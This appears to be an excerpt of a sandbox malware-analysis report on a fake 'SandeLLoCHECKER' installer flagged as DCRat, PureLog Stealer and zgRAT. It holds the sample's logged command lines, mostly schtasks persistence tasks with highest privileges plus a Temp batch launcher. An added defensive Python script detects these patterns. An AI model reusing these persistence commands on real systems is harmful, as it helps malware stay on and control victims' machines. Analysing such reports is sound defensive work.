                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:09:26:54
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"
                                                                                                                      Imagebase:0x1c0000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:09:26:54
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"
                                                                                                                      Imagebase:0x840000
                                                                                                                      File size:5'973'672 bytes
                                                                                                                      MD5 hash:8A0591A6B534E32FA179F2D781B79026
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:4
                                                                                                                      Start time:09:27:01
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                      Imagebase:0x7ff747e50000
                                                                                                                      File size:69'632 bytes
                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:5
                                                                                                                      Start time:09:27:01
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D C
                                                                                                                      Imagebase:0x310000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:7
                                                                                                                      Start time:09:27:02
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)"
                                                                                                                      Imagebase:0x310000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:8
                                                                                                                      Start time:09:27:03
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 C
                                                                                                                      Imagebase:0x310000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:9
                                                                                                                      Start time:09:27:05
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
                                                                                                                      Imagebase:0x240000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:09:27:05
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:09:27:05
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"
                                                                                                                      Imagebase:0x4e0000
                                                                                                                      File size:3'538'432 bytes
                                                                                                                      MD5 hash:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:14
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:16
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:17
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:18
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:19
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:20
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:21
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:22
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:23
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:24
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:25
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:26
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:27
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:28
                                                                                                                      Start time:09:27:11
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

Target ID: 29
Start time: 09:27:12
Start date: 08/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"
Imagebase: 0x7ff7d6740000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 09:27:12
Start date: 08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 09:27:12
Start date: 08/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff6fac10000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 09:27:12
Start date: 08/12/2024
Path: C:\Windows\System32\w32tm.exe
Wow64 process (32bit): false
Commandline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase: 0x7ff7682e0000
File size: 108'032 bytes
MD5 hash: 81A82132737224D324A3E8DA993E2FB5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 09:27:13
Start date: 08/12/2024
Path: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
Imagebase: 0xa60000
File size: 3'538'432 bytes
MD5 hash: 26C2B88440A62B4CB79201E01A404BD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Avira
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 100%, Joe Sandbox ML
• Detection: 100%, Joe Sandbox ML
• Detection: 63%, ReversingLabs
Has exited: true

Target ID: 36
Start time: 09:27:13
Start date: 08/12/2024
Path: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
Imagebase: 0x8c0000
File size: 3'538'432 bytes
MD5 hash: 26C2B88440A62B4CB79201E01A404BD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 37
Start time: 09:27:17
Start date: 08/12/2024
Path: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
Imagebase: 0xdf0000
File size: 3'538'432 bytes
MD5 hash: 26C2B88440A62B4CB79201E01A404BD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 63%, ReversingLabs
Has exited: true
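The process records above show the persistence and staging chain in one place: a `schtasks /create` task that re-runs a dropped binary every 13 minutes with `/rl HIGHEST`, a `cmd.exe /C` launcher for a `.bat` in `%TEMP%`, a `w32tm /stripchart /computer:localhost` call of the kind batch droppers use as a sleep substitute, and one MD5 (26C2B88440A62B4CB79201E01A404BD2) started from two different Program Files paths. The script below is an added example, not part of the Joe Sandbox report or of any vendor tooling: it transcribes those records from the report and runs a few triage heuristics over them. The rule names, the "15 minutes or less" threshold and the `w32tm`-as-sleep interpretation are my own assumptions; the Target ID of the `schtasks` entry lies before this excerpt and is left unknown.

```python
"""Triage heuristics over the process-tree records of this report (added example)."""
import re
from collections import defaultdict

# Transcribed from the report's process tree: image path, command line, MD5 of the image.
# The schtasks entry's Target ID is not in this excerpt, so it is recorded as None.
PROCESSES = [
    {"target": None, "path": r"C:\Windows\System32\schtasks.exe",
     "md5": "76CD6626DD8834BD4A42E6A565104DC2",
     "cmd": 'schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 '
            '/tr "\'C:\\Program Files (x86)\\reference assemblies\\Microsoft\\KAdpNCgonFhCnlBRasdZerWl.exe\'" '
            '/rl HIGHEST /f'},
    {"target": 29, "path": r"C:\Windows\System32\cmd.exe", "md5": "8A2122E8162DBEF04694B9C3E0B6CDEE",
     "cmd": r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"'},
    {"target": 30, "path": r"C:\Windows\System32\conhost.exe", "md5": "0D698AF330FD17BEE3BF90011D49251D",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"target": 31, "path": r"C:\Windows\System32\chcp.com", "md5": "33395C4732A49065EA72590B14B64F32",
     "cmd": "chcp 65001"},
    {"target": 32, "path": r"C:\Windows\System32\w32tm.exe", "md5": "81A82132737224D324A3E8DA993E2FB5",
     "cmd": "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"},
    {"target": 35, "path": r"C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe",
     "md5": "26C2B88440A62B4CB79201E01A404BD2",
     "cmd": r'"C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"'},
    {"target": 36, "path": r"C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe",
     "md5": "26C2B88440A62B4CB79201E01A404BD2",
     "cmd": r'"C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"'},
    {"target": 37, "path": r"C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe",
     "md5": "26C2B88440A62B4CB79201E01A404BD2",
     "cmd": r'"C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"'},
]

SCHTASKS_CREATE = re.compile(r'^\s*"?(?:.*\\)?schtasks(?:\.exe)?"?\s+/create\b', re.I)
# cmd /C pointing at a batch file under the user's Temp directory (staging script).
TEMP_BAT = re.compile(r'/c\s+"?[^"]*\\AppData\\Local\\Temp\\[^"\\]+\.bat', re.I)
# w32tm /stripchart against localhost: produces no useful time data, only a delay
# (assumption: treated here as a sleep substitute, a common batch-dropper idiom).
W32TM_SLEEP = re.compile(r'\bw32tm(?:\.exe)?\b.*?/stripchart\b.*?/computer:localhost', re.I)


def parse_schtasks(cmd):
    """Return the /tn, /sc, /mo, /rl and /tr values of a `schtasks /create` line, else None."""
    if not SCHTASKS_CREATE.match(cmd):
        return None

    def opt(name, value=r'(\S+)'):
        m = re.search(r'/%s\s+%s' % (name, value), cmd, re.I)
        return m.group(1) if m else None

    return {
        "tn": opt("tn", r'"([^"]*)"'),
        "sc": (opt("sc") or "").upper(),
        "mo": int(opt("mo") or 1),
        "rl": (opt("rl") or "LIMITED").upper(),
        # /tr may wrap the path in both double and single quotes, as in this report.
        "tr": opt("tr", r'"?\'?([^\'"]+)'),
    }


def score_task(task):
    """List the properties that make a task creation look like malware persistence."""
    reasons = []
    if task["sc"] == "MINUTE" and task["mo"] <= 15:          # threshold is an assumption
        reasons.append("re-executes every %d minute(s)" % task["mo"])
    if task["rl"] == "HIGHEST":
        reasons.append("runs with highest available privileges")
    if task["tr"] and not task["tr"].lower().startswith("c:\\windows\\"):
        reasons.append("target outside C:\\Windows: " + task["tr"])
    return reasons


def triage(processes):
    """Return (target, rule, detail) tuples for every heuristic that fires."""
    findings = []
    for p in processes:
        task = parse_schtasks(p["cmd"])
        if task and len(score_task(task)) >= 2:
            findings.append((p["target"], "scheduled-task-persistence",
                             "task %s: %s" % (task["tn"], "; ".join(score_task(task)))))
        if TEMP_BAT.search(p["cmd"]):
            findings.append((p["target"], "temp-batch-launcher", p["cmd"]))
        if W32TM_SLEEP.search(p["cmd"]):
            findings.append((p["target"], "w32tm-delay", p["cmd"]))
    # One image hash executed from several paths: the sample copied itself around.
    paths_by_md5 = defaultdict(set)
    for p in processes:
        paths_by_md5[p["md5"].upper()].add(p["path"].lower())
    for md5, paths in sorted(paths_by_md5.items()):
        if len(paths) > 1:
            findings.append((None, "self-copy-multiple-paths",
                             "%s seen at %d paths: %s" % (md5, len(paths), "; ".join(sorted(paths)))))
    return findings


if __name__ == "__main__":
    for target, rule, detail in triage(PROCESSES):
        print("[%s] target=%s %s" % (rule, target, detail))
```

Against the records above this yields four findings: the task `KAdpNCgonFhCnlBRasdZerWlK` (every 13 minutes, HIGHEST, target under Program Files), the Temp batch launcher of target 29, the `w32tm` delay of target 32, and the 26C2B884… image seen at both the Reference Assemblies and the Windows NT\Accessories\en-GB paths. The same parsers can be pointed at Sysmon Event ID 1 command lines; the `chcp 65001` and `conhost.exe` entries are deliberately not scored, since on their own they are ordinary batch-file side effects.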

Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.3%
Total number of Nodes: 1512
Total number of Limit Nodes: 42

